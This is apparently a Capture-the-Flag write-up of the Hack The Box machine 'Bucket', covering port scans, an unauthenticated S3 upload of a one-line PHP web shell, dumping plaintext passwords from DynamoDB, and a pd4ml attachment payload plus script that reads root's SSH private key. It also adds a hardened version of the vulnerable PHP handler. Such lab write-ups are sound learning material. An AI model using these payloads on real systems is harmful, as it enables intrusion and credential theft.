Port scanning

```
┌──(mikannse㉿kali)-[~/HTB/bucket]
└─$ sudo nmap --min-rate=10000 -p- 10.10.10.212
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-14 22:06 CST
Warning: 10.10.10.212 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.212
Host is up (0.070s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 15.24 seconds
```

```
┌──(mikannse㉿kali)-[~/HTB/bucket]
└─$ sudo nmap -sT -sC -sV -O -p22,80 10.10.10.212
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-14 22:11 CST
Nmap scan report for 10.10.10.212
Host is up (0.070s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open  http    Apache httpd 2.4.41
|_http-title: Did not follow redirect to http://bucket.htb/
|_http-server-header: Apache/2.4.41 (Ubuntu)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 5.0 (97%), Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.5 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.35 seconds
```
Add the hosts entry for bucket.htb.

S3 bucket

It looks like a blog page. In the page source there is an s3 domain; add it to hosts as well. This page probably has nothing else of interest, so move on to the s3 host, where the browser plugin shows it is served by hypercorn.

Judging from the earlier page source and the domain name, this is presumably an S3 bucket, meaning there is a bucket called adserver.

It also looks like an API endpoint, so try enumerating buckets.

There is a bucket called adserver.
```
┌──(mikannse㉿kali)-[~/HTB/bucket]
└─$ aws s3 ls --endpoint-url http://s3.bucket.htb/
2024-09-14 23:09:02 adserver
```
It holds an index.html and several images under the images key.
```
┌──(mikannse㉿kali)-[~/HTB/bucket]
└─$ aws s3 ls s3://adserver --endpoint-url http://s3.bucket.htb/
                           PRE images/
2024-09-14 23:09:03       5344 index.html
```

```
┌──(mikannse㉿kali)-[~/HTB/bucket]
└─$ aws s3 cp s3://adserver/index.html . --endpoint-url http://s3.bucket.htb/
download: s3://adserver/index.html to ./index.html
```
Downloading index.html shows it is identical to the index.html served by bucket.htb, so we also have permission to upload files into that site's web directory.
```
┌──(mikannse㉿kali)-[~/HTB/bucket]
└─$ echo '<?php system($_GET["cmd"]);?>' >shell.php
```

```
┌──(mikannse㉿kali)-[~/HTB/bucket]
└─$ aws s3 cp shell.php s3://adserver/ --endpoint-url http://s3.bucket.htb
upload: ./shell.php to s3://adserver/shell.php
```
The upload and the refresh take a little time, but commands do execute! Set up a reverse shell.

Lateral movement

There is another user, roy, whose home directory contains a project directory with a db.php that connects to DynamoDB.

There are also listeners on ports 8000 and 44899.
```
www-data@bucket:/home/roy/project$ ss -tlnp
State  Recv-Q Send-Q  Local Address:Port  Peer Address:Port Process
LISTEN 0      511         127.0.0.1:8000       0.0.0.0:*
LISTEN 0      4096        127.0.0.1:44899      0.0.0.0:*
LISTEN 0      4096    127.0.0.53%lo:53         0.0.0.0:*
LISTEN 0      4096        127.0.0.1:4566       0.0.0.0:*
LISTEN 0      128           0.0.0.0:22         0.0.0.0:*
LISTEN 0      511                 *:80               *:*
LISTEN 0      128              [::]:22            [::]:*
```
Look at DynamoDB first: connect and list the tables.
```
┌──(mikannse㉿kali)-[~/HTB/bucket]
└─$ aws --endpoint-url http://s3.bucket.htb dynamodb list-tables
{
    "TableNames": [
        "users"
    ]
}
```
There is a users table; dump all of it.
```
┌──(mikannse㉿kali)-[~/HTB/bucket]
└─$ aws --endpoint-url http://s3.bucket.htb dynamodb scan --table-name users
{
    "Items": [
        {
            "password": { "S": "Management@#1@#" },
            "username": { "S": "Mgmt" }
        },
        {
            "password": { "S": "Welcome123!" },
            "username": { "S": "Cloudadm" }
        },
        {
            "password": { "S": "n2vM-<_K_Q:.Aa2" },
            "username": { "S": "Sysadm" }
        }
    ],
    "Count": 3,
    "ScannedCount": 3,
    "ConsumedCapacity": null
}
```
That gives three pairs of credentials.
```
┌──(mikannse㉿kali)-[~/HTB/bucket]
└─$ cat dbresult |jq -r '.Items[].password.S'
Management@
Welcome123!
n2vM-<_K_Q:.Aa2
```
Try SSH as roy with each password; n2vM-<_K_Q:.Aa2 works.

Privilege escalation

Turn to ports 8000 and 44899; SSH port forwarding gets us to them.
```
┌──(mikannse㉿kali)-[~/HTB/bucket]
└─$ ssh -L 10000:127.0.0.1:8000 roy@10.10.10.212 -fN
roy@10.10.10.212's password:
```
First look at the Apache virtual host configuration.
```
roy@bucket:/tmp$ cat /etc/apache2/
apache2.conf     conf-enabled/    magic            mods-enabled/    sites-available/
conf-available/  envvars          mods-available/  ports.conf       sites-enabled/
roy@bucket:/tmp$ cat /etc/apache2/sites-enabled/000-default.conf
<VirtualHost 127.0.0.1:8000>
	<IfModule mpm_itk_module>
		AssignUserId root root
	</IfModule>
	DocumentRoot /var/www/bucket-app
</VirtualHost>
<VirtualHost *:80>
	DocumentRoot /var/www/html
	RewriteEngine On
	RewriteCond %{HTTP_HOST} !^bucket.htb$
	RewriteRule /.* http://bucket.htb/ [R]
</VirtualHost>
<VirtualHost *:80>
	<SNIP>
	ProxyPreserveHost on
	ProxyPass / http://localhost:4566/
	ProxyPassReverse / http://localhost:4566/
	<Proxy *>
		Order deny,allow
		Allow from all
	</Proxy>
	ServerAdmin webmaster@localhost
	ServerName s3.bucket.htb
	<SNIP>
```
Port 8000 serves /var/www/bucket-app, and it runs as root (AssignUserId root root). Looking at that directory, the files are owned by root and we currently only have read access. Look at index.php.
```php
<?php
require 'vendor/autoload.php';

use Aws\DynamoDb\DynamoDbClient;

if ($_SERVER["REQUEST_METHOD"] === "POST") {
    if ($_POST["action"] === "get_alerts") {
        date_default_timezone_set('America/New_York');
        $client = new DynamoDbClient([
            'profile' => 'default',
            'region' => 'us-east-1',
            'version' => 'latest',
            'endpoint' => 'http://localhost:4566'
        ]);

        $iterator = $client->getIterator('Scan', array(
            'TableName' => 'alerts',
            'FilterExpression' => "title = :title",
            'ExpressionAttributeValues' => array(":title" => array("S" => "Ransomware")),
        ));

        foreach ($iterator as $item) {
            $name = rand(1, 10000) . '.html';
            file_put_contents('files/' . $name, $item["data"]);
        }
        passthru("java -Xmx512m -Djava.awt.headless=true -cp pd4ml_demo.jar Pd4Cmd file:///var/www/bucket-app/files/$name 800 A4 -out files/result.pdf");
    }
} else {
?>
<script src="https://static.codepen.io/assets/common/stopExecutionOnTimeout-157cd5b220a5c80d4ff8e0e70ac069bffd87a61252088146915e8726e5d9f147.js"></script>
<script id="rendered-js">
// ¯\_(ツ)_/¯ I told you that there was no JS
//# sourceURL=pen.js
</script>
</body>
</html>
<?php } ?>
```
The main logic checks whether the POST parameter "action" equals "get_alerts". If it does, it connects to the local 'alerts' table, scans for records whose title is "Ransomware", and saves each one as an HTML file in the files/ directory. It then uses the pd4ml tool to convert the HTML file to PDF.

pd4ml allows attachments to be added to the output, like this:
```html
<html>
<pd4ml:attachment src="/etc/passwd" description="attachment sample" icon="Paperclip" />
</html>
```
So this amounts to an arbitrary file read: change the file in src and it is picked up during the scan and carried into the PDF, which we can read.

Since there is no alerts table yet, one has to be created first; the official AWS documentation template can be used as a reference.
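As an added hardening example (not code from the box), here is the same get_alerts handler with the read primitive closed: alert markup coming from DynamoDB is reduced to plain formatting tags with every attribute dropped, so pd4ml:attachment and local src paths never reach the renderer, the HTML file name is unpredictable, and the path is quoted before the java call. It assumes the same endpoint, table name and pd4ml_demo.jar as the original; the vhost should also lose AssignUserId root root so that whatever the renderer can read is not read as root.

```php
<?php
// Added example, not the box's own code. Same DynamoDB endpoint/table and
// pd4ml_demo.jar as the original index.php are assumed.
require 'vendor/autoload.php';

use Aws\DynamoDb\DynamoDbClient;

// Keep only text-formatting tags and strip every attribute from them, so
// pd4ml:attachment, <img src="file:...">, etc. cannot survive into the HTML
// that the renderer sees.
function sanitize_alert_html(string $html): string {
    $html = strip_tags($html, '<p><b><i><u><br><ul><ol><li><h1><h2><h3>');
    return preg_replace('#<(\w+)\b[^>]*>#', '<$1>', $html);
}

if ($_SERVER["REQUEST_METHOD"] === "POST" && ($_POST["action"] ?? '') === "get_alerts") {
    date_default_timezone_set('America/New_York');
    $client = new DynamoDbClient([
        'profile'  => 'default',
        'region'   => 'us-east-1',
        'version'  => 'latest',
        'endpoint' => 'http://localhost:4566',
    ]);
    $iterator = $client->getIterator('Scan', [
        'TableName'                 => 'alerts',
        'FilterExpression'          => 'title = :title',
        'ExpressionAttributeValues' => [':title' => ['S' => 'Ransomware']],
    ]);

    $written = [];
    foreach ($iterator as $item) {
        // Unpredictable name instead of rand(1, 10000); the item's string value is
        // read explicitly rather than handing the raw attribute map to file_put_contents.
        $path = 'files/' . bin2hex(random_bytes(8)) . '.html';
        file_put_contents($path, sanitize_alert_html((string) ($item['data']['S'] ?? '')));
        $written[] = $path;
    }

    // The original only rendered the last $name; render each written file, and pass
    // the path through escapeshellarg so it cannot alter the java command line.
    foreach ($written as $path) {
        passthru('java -Xmx512m -Djava.awt.headless=true -cp pd4ml_demo.jar Pd4Cmd '
            . escapeshellarg('file://' . realpath($path)) . ' 800 A4 -out files/result.pdf');
    }
}
```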
```
┌──(mikannse㉿kali)-[~/HTB/bucket]
└─$ aws --endpoint-url http://s3.bucket.htb dynamodb create-table --table-name alerts --attribute-definitions AttributeName=title,AttributeType=S AttributeName=data,AttributeType=S --key-schema AttributeName=title,KeyType=HASH AttributeName=data,KeyType=RANGE --provisioned-throughput ReadCapacityUnits=10,WriteCapacityUnits=5
{
    "TableDescription": {
        "AttributeDefinitions": [
            { "AttributeName": "title", "AttributeType": "S" },
            { "AttributeName": "data", "AttributeType": "S" }
        ],
        "TableName": "alerts",
        "KeySchema": [
            { "AttributeName": "title", "KeyType": "HASH" },
            { "AttributeName": "data", "KeyType": "RANGE" }
        ],
        "TableStatus": "ACTIVE",
        "CreationDateTime": "2024-09-15T15:33:51.623000+08:00",
        "ProvisionedThroughput": {
            "LastIncreaseDateTime": "1970-01-01T08:00:00+08:00",
            "LastDecreaseDateTime": "1970-01-01T08:00:00+08:00",
            "NumberOfDecreasesToday": 0,
            "ReadCapacityUnits": 10,
            "WriteCapacityUnits": 5
        },
        "TableSizeBytes": 0,
        "ItemCount": 0,
        "TableArn": "arn:aws:dynamodb:us-east-1:000000000000:table/alerts"
    }
}
```

```
┌──(mikannse㉿kali)-[~/HTB/bucket]
└─$ aws --endpoint-url http://s3.bucket.htb dynamodb list-tables
{
    "TableNames": [
        "alerts",
        "users"
    ]
}
```
So try to steal root's SSH key.
```
aws --endpoint-url http://s3.bucket.htb dynamodb put-item --table-name alerts --item '{"title":{"S":"Ransomware"},"data":{"S":"<html><pd4ml:attachment src=\"/root/.ssh/id_rsa\" description=\"attachment sample\" icon=\"Paperclip\"/></html>"}}'
```
But the newly created table disappears; running pspy shows that a cleanup script is executed on a schedule. So write a shell script that does everything in one go.
```bash
#!/bin/bash
aws --endpoint-url http://s3.bucket.htb dynamodb create-table --table-name alerts \
  --attribute-definitions AttributeName=title,AttributeType=S AttributeName=data,AttributeType=S \
  --key-schema AttributeName=title,KeyType=HASH AttributeName=data,KeyType=RANGE \
  --provisioned-throughput ReadCapacityUnits=10,WriteCapacityUnits=5 >/dev/null
sleep 0.5
aws --endpoint-url http://s3.bucket.htb dynamodb put-item --table-name alerts \
  --item '{"title":{"S":"Ransomware"},"data":{"S":"<html><pd4ml:attachment src=\"/root/.ssh/id_rsa\" description=\"attachment sample\" icon=\"Paperclip\"/></html>"}}' >/dev/null
sleep 0.5
curl -s http://127.0.0.1:10000/index.php -d 'action=get_alerts'
sleep 0.5
```
Then copy the PDF file down from the target.
```
┌──(mikannse㉿kali)-[~/HTB/bucket]
└─$ scp roy@bucket.htb:/tmp/result.pdf ./result.pdf
roy@bucket.htb's password:
result.pdf                                    100%   19KB  96.7KB/s   00:00
```

```
┌──(mikannse㉿kali)-[~/HTB/bucket]
└─$ firefox result.pdf
```
Open the PDF in the browser, click the attachment, and it can be saved to disk.
```
┌──(mikannse㉿kali)-[~/HTB/bucket]
└─$ ssh -i id_rsa root@bucket.htb
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-48-generic x86_64)
<SNIP>
Last login: Tue Feb 9 14:39:03 2021
root@bucket:~
uid=0(root) gid=0(root) groups=0(root)
```
We are root!

Closing thoughts

The environment of this box was quite unfamiliar; it is cloud security material again. The chain goes from an unauthenticated file write, to abusing DynamoDB, and finally to a PDF renderer feature for privilege escalation.